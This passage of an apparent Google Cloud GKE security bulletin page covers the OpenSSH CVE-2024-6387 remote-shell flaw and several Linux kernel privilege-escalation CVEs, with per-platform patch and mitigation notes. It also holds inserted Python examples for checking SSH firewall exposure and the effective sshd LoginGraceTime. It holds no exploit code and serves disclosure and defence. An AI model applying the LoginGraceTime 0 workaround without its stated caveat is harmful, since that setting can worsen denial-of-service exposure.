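    return "public nodes, but no rule admits SSH from untrusted sources"


if __name__ == "__main__":
    for sample in (SAMPLE_CLUSTER_PUBLIC, SAMPLE_CLUSTER_PRIVATE):
        print(json.loads(sample)["name"], "->", triage(sample, SAMPLE_FIREWALL_RULES))
```

Run against real output by piping the two gcloud commands into files and passing their contents to `triage`; the trusted ranges are the one input you must supply yourself, since the bulletin's "trusted networks" is a per-organization decision.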
GDC (VMware)
Updated: 2024-07-11
Description | Severity |
---|---|
2024-07-11 Update: The following versions of GDC software for VMware have been updated with code to fix this vulnerability. Upgrade your admin workstation, admin clusters, and user clusters (including node pools) to one of the following versions or later. For instructions, see Upgrade a cluster or node pool.
The 2024-07-02 update to this bulletin incorrectly stated that all supported versions of Ubuntu images on GDC software for VMware run versions of OpenSSH that are vulnerable to this issue. Ubuntu images on GDC software for VMware version 1.16 clusters run versions of OpenSSH that are not vulnerable to this issue. Ubuntu images in GDC software for VMware 1.28 and 1.29 are vulnerable. Container-Optimized OS images on all supported versions of GDC software for VMware are vulnerable to this issue.
2024-07-02 Update: All supported versions of Container-Optimized OS and Ubuntu images on GDC software for VMware run versions of OpenSSH that are vulnerable to this issue. GDC software for VMware clusters with public node IP addresses and SSH exposed to the Internet should be treated with the highest priority for mitigation.
A remote code execution vulnerability, CVE-2024-6387, was recently discovered in OpenSSH. The vulnerability exploits a race condition that could be used to obtain access to a remote shell, enabling attackers to gain root access to GKE nodes. At the time of publication, exploitation is believed to be difficult and take several hours per machine being attacked. We are not aware of any exploitation attempts.
What should I do?
2024-07-02 Update: A patched GDC software for VMware version that includes an updated OpenSSH will be made available as soon as possible. This bulletin will be updated when patches are available. We recommend that you apply the following mitigations as necessary.
Disallow SSH to the cluster nodes
You can change your infrastructure network setup to disallow SSH connectivity from untrusted sources, such as the public Internet.
Change sshd configuration
If you can't apply the preceding mitigation, we have published a DaemonSet that sets the sshd |
Critical |
GKE on AWS
Updated: 2024-07-11
Description | Severity |
---|---|
2024-07-11 Update: The following versions of GKE on AWS have been updated with code to fix this vulnerability:
Upgrade your GKE on AWS control plane and node pools to one of these patched versions or later. For instructions, see Upgrade your AWS cluster version and Update a node pool.
2024-07-02 Update: All supported versions of Ubuntu images on GKE on AWS run versions of OpenSSH that are vulnerable to this issue. GKE on AWS clusters with public node IP addresses and SSH exposed to the Internet should be treated with the highest priority for mitigation.
A remote code execution vulnerability, CVE-2024-6387, was recently discovered in OpenSSH. The vulnerability exploits a race condition that could be used to obtain access to a remote shell, enabling attackers to gain root access to GKE nodes. At the time of publication, exploitation is believed to be difficult and take several hours per machine being attacked. We are not aware of any exploitation attempts.
What should I do?
2024-07-02 Update: A patched GKE on AWS version that includes an updated OpenSSH will be made available as soon as possible. This bulletin will be updated when patches are available. We recommend that you work through the following steps to check your cluster's exposure, and apply the described mitigations as necessary.
Determine whether your nodes have public IP addresses
GKE on AWS doesn't provision any machine with either public IP addresses or with firewall rules that allow traffic to port 22 by default. However, depending on your subnet configuration, machines can automatically get a public IP address during provisioning. To check whether nodes are provisioned with public IP addresses, look at the configuration of the subnet that's associated with your AWS node pool resource.
Disallow SSH to the cluster nodes
Even though GKE on AWS doesn't allow traffic on port 22 on any node by default, customers can attach additional security groups to node pools, enabling inbound SSH traffic. We recommend that you remove or scope down corresponding rules from the provided security groups.
Convert public node pools to private
To best protect clusters with public nodes, we recommend first disallowing SSH through your security group, as described in the previous section. If you can't disallow SSH through the security group rules, you can convert public node pools to private by disabling the option to automatically assign public IPs to machines within a subnet and reprovisioning the node pool. |
Critical |
GKE on Azure
Updated: 2024-07-11
Description | Severity |
---|---|
2024-07-11 Update: The following versions of GKE on Azure have been updated with code to fix this vulnerability:
Upgrade your GKE on Azure control plane and node pools to one of these patched versions or later. For instructions, see Upgrade your Azure cluster version and Update a node pool.
2024-07-02 Update: All supported versions of Ubuntu images on GKE on Azure run versions of OpenSSH that are vulnerable to this issue. GKE on Azure clusters with public node IP addresses and SSH exposed to the Internet should be treated with the highest priority for mitigation.
A remote code execution vulnerability, CVE-2024-6387, was recently discovered in OpenSSH. The vulnerability exploits a race condition that could be used to obtain access to a remote shell, enabling attackers to gain root access to GKE nodes. At the time of publication, exploitation is believed to be difficult and take several hours per machine being attacked. We are not aware of any exploitation attempts.
What should I do?
2024-07-02 Update: A patched GKE on Azure version that includes an updated OpenSSH will be made available as soon as possible. This bulletin will be updated when patches are available. We recommend that you work through the following steps to check your cluster's exposure, and apply the described mitigations as necessary.
Determine whether your nodes have public IP addresses
GKE on Azure doesn't provision any machine with either public IP addresses or with firewall rules that allow traffic to port 22 by default. To review your Azure configuration to check whether there are any public IP addresses configured on your GKE on Azure cluster, run the following command:
az network public-ip list -g
Disallow SSH to the cluster nodes
Even though GKE on Azure doesn't allow traffic on port 22 on any node by default, customers can update NetworkSecurityGroup rules on node pools, enabling inbound SSH traffic from the public internet. We strongly recommend that you review the Network Security Groups (NSGs) associated with your Kubernetes clusters. If an NSG rule exists that allows unrestricted inbound traffic on port 22 (SSH), do one of the following:
Convert public node pools to private
To best protect clusters with public nodes, we recommend first disallowing SSH through your security group, as described in the previous section. If you can't disallow SSH through the security group rules, you can convert public node pools to private by removing the public IP addresses associated with the VMs. To remove a public IP address from a VM and replace it with a private IP address configuration, see Dissociate a public IP address from an Azure VM. Impact: Any existing connections using the public IP address will be disrupted. Ensure that you have alternative access methods in place, like a VPN or Azure Bastion. |
Critical |
GDC (bare metal)
Updated: 2024-07-02
Description | Severity |
---|---|
2024-07-02 Update: The original version of this bulletin for GDC software for bare metal incorrectly stated that patch versions were in progress. GDC software for bare metal is not directly affected because it doesn't manage the operating system SSH daemon or configuration. Patch versions are therefore the responsibility of the operating system provider, as described in the What should I do? section.
A remote code execution vulnerability, CVE-2024-6387, was recently discovered in OpenSSH. The vulnerability exploits a race condition that could be used to obtain access to a remote shell, enabling attackers to gain root access to GKE nodes. At the time of publication, exploitation is believed to be difficult and take several hours per machine being attacked. We are not aware of any exploitation attempts.
What should I do?
2024-07-02 Update: Contact your OS provider to obtain a patch for the operating systems in use with GDC software for bare metal. Until you've applied the OS vendor patch, ensure that publicly reachable machines don't allow SSH connections from the internet. If that isn't possible, an alternative is to set the
grep "^LoginGraceTime" /etc/ssh/sshd_config
LoginGraceTime 0
Note that this configuration change might increase the risk of denial of service attacks and may cause issues with legitimate SSH access.
Original 2024-07-01 text (see the preceding 2024-07-02 update for a correction): |
Critical |
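The bare-metal section above verifies the sshd mitigation with `grep "^LoginGraceTime" /etc/ssh/sshd_config` and expects `LoginGraceTime 0`. That grep lists every occurrence of the keyword but cannot tell which one sshd applies: sshd keeps the first value it reads for a keyword, accepts both `Key value` and `Key=value`, matches keywords case-insensitively, and treats `#` as a comment. The following parser, an added example that is not from this bulletin or any vendor tool, resolves the effective value the way sshd does so that a verification script reports the setting actually in force. The three sample configurations are constructed; the code assumes a single file and does not follow Include directives.

```python
"""Report the LoginGraceTime that sshd will actually apply.

Added example, not from the bulletin or any vendor tool. sshd reads
sshd_config top to bottom and keeps the FIRST value it sees for a keyword;
keywords are case-insensitive, '#' starts a comment, and "Key value" or
"Key=value" are both accepted. Assumption: one file, no Include directives.
"""
import re

DEFAULT_LOGIN_GRACE_SECONDS = 120   # sshd's documented default ("2m")

_UNIT_SECONDS = {"": 1, "s": 1, "m": 60, "h": 3600, "d": 86400, "w": 604800}
_TIME_RE = re.compile(r"(\d+)([smhdw]?)", re.IGNORECASE)


def parse_sshd_time(value):
    """sshd time format: '0', '600', '30s', '2m', '1h30m', ... -> seconds."""
    if not re.fullmatch(r"(?:\d+[smhdw]?)+", value, re.IGNORECASE):
        raise ValueError(f"not an sshd time value: {value!r}")
    return sum(int(n) * _UNIT_SECONDS[u.lower()] for n, u in _TIME_RE.findall(value))


def effective_login_grace_time(config_text):
    """Seconds sshd allows for authentication to complete; 0 removes the limit."""
    for raw in config_text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments and blank lines
        if not line:
            continue
        m = re.match(r"([A-Za-z]+)\s*(?:=|\s)\s*(\S+)", line)
        if not m:
            continue
        key, value = m.group(1).lower(), m.group(2)
        if key == "match":
            # LoginGraceTime is not permitted inside a Match block, so nothing
            # after the first Match line can set it.
            break
        if key == "logingracetime":
            return parse_sshd_time(value)         # first occurrence wins
    return DEFAULT_LOGIN_GRACE_SECONDS


def mitigation_applied(config_text):
    """True only when the bulletin's LoginGraceTime 0 setting is the one in force."""
    return effective_login_grace_time(config_text) == 0


# Constructed sample configurations.
CONFIG_MITIGATED = "Port 22\nLoginGraceTime 0\nPermitRootLogin no\n"

# grep "^LoginGraceTime" prints two lines here, but sshd applies the first (2m):
# the mitigation line appended at the bottom is silently ignored.
CONFIG_LATER_LINE_IGNORED = "LoginGraceTime 2m\nPermitRootLogin no\nLoginGraceTime 0\n"

# Keyword only present in a comment: the default applies.
CONFIG_NO_SETTING = "Port 22\n# LoginGraceTime 0\nPermitRootLogin no\n"

if __name__ == "__main__":
    for name, cfg in (("mitigated", CONFIG_MITIGATED),
                      ("later-line", CONFIG_LATER_LINE_IGNORED),
                      ("default", CONFIG_NO_SETTING)):
        print(f"{name}: effective LoginGraceTime = {effective_login_grace_time(cfg)}s,"
              f" mitigated={mitigation_applied(cfg)}")
```

To check a real host, read `/etc/ssh/sshd_config` into a string and pass it to `mitigation_applied`; a False result on a host where grep shows `LoginGraceTime 0` means an earlier line is overriding it. The bulletin's caveat still applies to the setting itself: a grace time of 0 removes the authentication time limit and can make legitimate access and denial-of-service behaviour worse.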
GCP-2024-039
Published: 2024-06-28
Updated: 2024-09-25
Reference:
CVE-2024-26923
2024-09-25 Update: Added patch versions for GDC (VMware).
2024-08-20 Update: Added patch versions for Ubuntu node pools on GKE.
GKE
Updated: 2024-08-20
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
GKE Standard and Autopilot clusters are impacted. Clusters using GKE Sandbox aren't impacted.
What should I do?
2024-08-20 Update: The following versions of GKE are updated with code to fix this vulnerability on Ubuntu. Upgrade your Ubuntu node pools to the following versions or later:
The following minor versions are affected. Upgrade your Container-Optimized OS node pools to one of the following patch versions or later:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patch version becomes the default in your release channel. For details, see Run patch versions from a newer channel. |
High |
GDC (VMware)
Updated: 2024-09-25
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do?
2024-09-25 Update: The following versions of GDC software for VMware are updated with code to fix this vulnerability. Upgrade your GDC software for VMware clusters to the following versions or later:
|
Pending |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GDC (bare metal)
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do?
There is no action required. GDC software for bare metal isn't affected as it does not bundle an operating system in its distribution. |
None |
GCP-2024-038
Published: 2024-06-26
Updated: 2024-09-17
Reference:
CVE-2024-26924
2024-09-17 Update: Added patch versions for GDC (VMware).
2024-08-06 Update: Added patch versions for Ubuntu node pools on GKE.
GKE
Updated: 2024-08-06
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
GKE Standard clusters are impacted. GKE Autopilot clusters in the default configuration are not impacted, but might be vulnerable if you explicitly set the seccomp
Clusters using GKE Sandbox aren't impacted.
What should I do?
2024-08-06 Update: Added patch versions for Ubuntu node pools on GKE. The following versions of GKE are updated with code to fix this vulnerability on Ubuntu. Upgrade your Ubuntu node pools to the following versions or later:
The following minor versions are affected. Upgrade your Container-Optimized OS node pools to one of the following patch versions or later:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patch version becomes the default in your release channel. For details, see Run patch versions from a newer channel. |
High |
GDC (VMware)
Updated: 2024-09-17
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do?
2024-09-17 Update: The following versions of GDC software for VMware are updated with code to fix this vulnerability. Upgrade your GDC software for VMware clusters to the following versions or later:
|
Pending |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GDC (bare metal)
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do?
There is no action required. GDC software for bare metal isn't affected as it does not bundle an operating system in its distribution. |
None |
GCP-2024-036
Published: 2024-06-18
Reference:
CVE-2024-26584
GKE
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS nodes:
GKE Standard and Autopilot clusters are impacted. Clusters using GKE Sandbox aren't impacted.
What should I do?
The following minor versions are affected. Upgrade your Container-Optimized OS node pools to one of the following patch versions or later:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patch version becomes the default in your release channel. For details, see Run patch versions from a newer channel. |
High |
GKE on VMware
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS nodes:
What should I do? |
Pending |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS nodes:
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS nodes:
What should I do? |
Pending |
GKE on Bare Metal
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS nodes:
What should I do?
There is no action required. GKE on Bare Metal isn't affected as it does not bundle an operating system in its distribution. |
None |
GCP-2024-035
Published: 2024-06-12
Updated: 2024-07-18
Reference:
CVE-2024-26584
2024-07-18 Update: Added patch versions for Ubuntu node pools on GKE and added a patch version for version 1.27 on Container-Optimized OS node pools.
GKE
Updated: 2024-07-18
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
GKE Standard and Autopilot clusters are impacted. Clusters using GKE Sandbox aren't impacted.
What should I do?
2024-07-18 Update: The following versions of GKE are updated with code to fix this vulnerability on Ubuntu. Upgrade your Ubuntu node pools to one of the following patch versions or later:
The following version of GKE is updated with code to fix this vulnerability on Container-Optimized OS. Upgrade your Container-Optimized OS node pools to the following patch version or later:
The following minor versions are affected. Upgrade your Container-Optimized OS node pools to one of the following patch versions or later:
The following minor versions are affected but don't have a patch version available. We'll update this bulletin when patch versions are available:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patch version becomes the default in your release channel. For details, see Run patch versions from a newer channel. |
High |
GKE on VMware
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on Bare Metal
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do?
There is no action required. GKE on Bare Metal isn't affected as it does not bundle an operating system in its distribution. |
None |
GCP-2024-034
Published: 2024-06-11
Updated: 2024-07-10
Reference:
CVE-2024-26583
2024-07-10 Update: Added patch versions for Container-Optimized OS nodes running minor version 1.26 and 1.27 and added patch versions for Ubuntu nodes.
GKE
Updated: 2024-07-10
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS nodes:
GKE Standard and Autopilot clusters are impacted. Clusters using GKE Sandbox aren't impacted.
What should I do?
2024-07-10 Update: The following versions of GKE are updated with code to fix this vulnerability. Upgrade your Ubuntu node pools to one of the following patch versions or later:
For minor versions 1.26 and 1.27, upgrade your Container-Optimized OS node pools to one of the following patch versions or later:
The following minor versions are affected. Upgrade your Container-Optimized OS node pools to one of the following patch versions or later:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patch version becomes the default in your release channel. For details, see Run patch versions from a newer channel. |
High |
GKE on VMware
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS nodes:
What should I do? |
Pending |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS nodes:
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS nodes:
What should I do? |
Pending |
GKE on Bare Metal
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS nodes:
What should I do?
There is no action required. GKE on Bare Metal isn't affected as it does not bundle an operating system in its distribution. |
None |
GCP-2024-033
Published: 2024-06-10
Updated: 2024-09-26
Reference:
CVE-2022-23222
2024-09-26 Update: Added patch versions for GDC (VMware).
GKE
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS nodes:
GKE Standard and Autopilot clusters are impacted. Clusters using GKE Sandbox aren't impacted.
What should I do?
The following minor versions are affected. Upgrade your Container-Optimized OS node pools to one of the following patch versions or later:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patch version becomes the default in your release channel. For details, see Run patch versions from a newer channel. |
High |
GKE on VMware
Updated: 2024-09-26
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS nodes:
What should I do?
2024-09-26 Update: The following versions of GDC software for VMware are updated with code to fix this vulnerability. Upgrade your GDC software for VMware clusters to the following versions or later:
|
Pending |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS nodes:
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS nodes:
What should I do? |
Pending |
GKE on Bare Metal
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS nodes:
What should I do?
There is no action required. GKE on Bare Metal isn't affected as it does not bundle an operating system in its distribution. |
None |
GCP-2024-031
Published: 2024-05-24
Reference: CVE-2024-4323
GKE
Description | Severity |
---|---|
A new vulnerability (CVE-2024-4323) has been discovered in Fluent Bit that could result in remote code execution. Fluent Bit versions 2.0.7 through 3.0.3 are affected. GKE doesn't use a vulnerable version of Fluent Bit, and is unaffected.
What should I do?
GKE isn't affected by this vulnerability. No action is required. |
None |
GKE on VMware
Description | Severity |
---|---|
A new vulnerability (CVE-2024-4323) has been discovered in Fluent Bit that could result in remote code execution. Fluent Bit versions 2.0.7 through 3.0.3 are affected. GKE on VMware doesn't use a vulnerable version of Fluent Bit, and is unaffected.
What should I do?
GKE on VMware isn't affected by this vulnerability. No action is required. |
None |
GKE on AWS
Description | Severity |
---|---|
A new vulnerability (CVE-2024-4323) has been discovered in Fluent Bit that could result in remote code execution. Fluent Bit versions 2.0.7 through 3.0.3 are affected. GKE on AWS doesn't use a vulnerable version of Fluent Bit, and is unaffected.
What should I do?
GKE on AWS isn't affected by this vulnerability. No action is required. |
None |
GKE on Azure
Description | Severity |
---|---|
A new vulnerability (CVE-2024-4323) has been discovered in Fluent Bit that could result in remote code execution. Fluent Bit versions 2.0.7 through 3.0.3 are affected. GKE on Azure doesn't use a vulnerable version of Fluent Bit, and is unaffected.
What should I do?
GKE on Azure isn't affected by this vulnerability. No action is required. |
None |
GKE on Bare Metal
Description | Severity |
---|---|
A new vulnerability (CVE-2024-4323) has been discovered in Fluent Bit that could result in remote code execution. Fluent Bit versions 2.0.7 through 3.0.3 are affected. GKE on Bare Metal doesn't use a vulnerable version of Fluent Bit, and is unaffected.
What should I do?
GKE on Bare Metal isn't affected by this vulnerability. No action is required. |
None |
GCP-2024-030
Published: 2024-05-15
Updated: 2024-07-18
Reference:
CVE-2023-52620
2024-07-18 Update: Added patch versions for Ubuntu node pools on GKE.
GKE
Updated: 2024-07-18
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
GKE Standard clusters are impacted. GKE Autopilot clusters in the default configuration are not impacted, but might be vulnerable if you explicitly set the seccomp
Clusters using GKE Sandbox aren't impacted.
What should I do?
2024-07-18 Update: The following versions of GKE are updated with code to fix this vulnerability on Ubuntu. Upgrade your Ubuntu node pools to one of the following patch versions or later:
The following minor versions are affected. Upgrade your Container-Optimized OS node pools to one of the following patch versions or later:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patch version becomes the default in your release channel. For details, see Run patch versions from a newer channel. |
High |
GKE on VMware
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on Bare Metal
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do?
There is no action required. GKE on Bare Metal isn't affected as it does not bundle an operating system in its distribution. |
None |
GCP-2024-029
Published: 2024-05-14
Updated: 2024-08-19
Reference:
CVE-2024-26642
2024-08-19 Update: Added patch versions for Ubuntu nodes.
GKE
Updated: 2024-08-19
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
GKE Standard clusters are impacted. GKE Autopilot clusters in the default configuration are not impacted, but might be vulnerable if you explicitly set the seccomp
Clusters using GKE Sandbox aren't impacted.
What should I do?
2024-08-19 Update: The following versions of GKE are updated with code to fix this vulnerability on Ubuntu. Upgrade your Ubuntu node pools to the following versions or later:
The following minor versions are affected. Upgrade your Container-Optimized OS node pools to one of the following patch versions or later:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patch version becomes the default in your release channel. For details, see Run patch versions from a newer channel. |
High |
GKE on VMware
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on Bare Metal
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do?
There is no action required. GKE on Bare Metal isn't affected as it does not bundle an operating system in its distribution. |
None |
GCP-2024-028
Published: 2024-05-13
Updated: 2024-05-22
Reference:
CVE-2024-26581
2024-05-22 Update: Added patch versions for Ubuntu nodes.
GKE
Updated: 2024-05-22
Description | Severity |
---|---|
The following vulnerability was discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes: CVE-2024-26581.
GKE Standard clusters are impacted. GKE Autopilot clusters in the default configuration are not impacted, but might be vulnerable if you explicitly set the seccomp Unconfined profile or allow additional Linux capabilities. Clusters using GKE Sandbox aren't impacted.
What should I do?
2024-05-22 Update: The following versions of GKE are updated with code to fix this vulnerability on Ubuntu. Upgrade your Ubuntu node pools to the following versions or later:
The following minor versions are affected. Upgrade your Container-Optimized OS node pools to one of the following patch versions or later:
The following minor versions are affected. Upgrade your Ubuntu node pools to one of the following patch versions or later:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patch version becomes the default in your release channel. For details, see Run patch versions from a newer channel. |
High |
GKE on VMware
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on Bare Metal
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do?
There is no action required. GKE on Bare Metal isn't affected as it does not bundle an operating system in its distribution. |
None |
GCP-2024-027
Published: 2024-05-08
Updated: 2024-09-25
Reference:
CVE-2024-26808
2024-09-25 Update: Added patch versions for GDC (VMware).
2024-05-15 Update: Added patch versions for GKE Ubuntu node pools.
2024-05-09 Update: Corrected severity from Medium to High and clarified that GKE Autopilot clusters in the default configuration are not impacted.
GKE
Updated: 2024-05-09, 2024-05-15
Description | Severity |
---|---|
The following vulnerability was discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes: CVE-2024-26808.
2024-05-09 Update: Corrected severity from Medium to High. The original bulletin stated that Autopilot clusters are impacted, but this was incorrect. GKE Autopilot clusters in the default configuration are not impacted, but might be vulnerable if you explicitly set the seccomp Unconfined profile or allow additional Linux capabilities.
GKE Standard clusters are impacted. Clusters using GKE Sandbox aren't impacted.
What should I do?
2024-05-15 Update: The following versions of GKE are updated with code to fix this vulnerability on Ubuntu. Upgrade your Ubuntu node pools to the following versions or later:
The following minor versions are affected. Upgrade your Container-Optimized OS node pools to one of the following patch versions or later:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patch version becomes the default in your release channel. For details, see Run patch versions from a newer channel. |
High |
GKE on VMware
Updated: 2024-09-25
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do?
2024-09-25 Update: The following versions of GDC software for VMware are updated with code to fix this vulnerability. Upgrade your GDC software for VMware clusters to the following versions or later:
|
Pending |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on Bare Metal
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do?
There is no action required. GKE on Bare Metal isn't affected as it does not bundle an operating system in its distribution. |
None |
GCP-2024-026
Published: 2024-05-07
Updated: 2024-08-06
Reference:
CVE-2024-26643
2024-08-06 Update: Added patch versions for Ubuntu node pools on GKE.
2024-05-09 Update: Corrected severity from Medium to High.
GKE
Updated: 2024-08-06
Description | Severity |
---|---|
The following vulnerability was discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes: CVE-2024-26643.
2024-05-09 Update: Corrected severity from Medium to High.
GKE Standard clusters are impacted. GKE Autopilot clusters in the default configuration are not impacted, but might be vulnerable if you explicitly set the seccomp Unconfined profile or allow additional Linux capabilities. Clusters using GKE Sandbox aren't impacted.
What should I do?
2024-08-06 Update: Added patch versions for Ubuntu node pools on GKE. The following versions of GKE are updated with code to fix this vulnerability on Ubuntu. Upgrade your Ubuntu node pools to the following versions or later:
The following minor versions are affected. Upgrade your Container-Optimized OS node pools to one of the following patch versions or later:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patch version becomes the default in your release channel. For details, see Run patch versions from a newer channel. |
High |
GKE on VMware
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
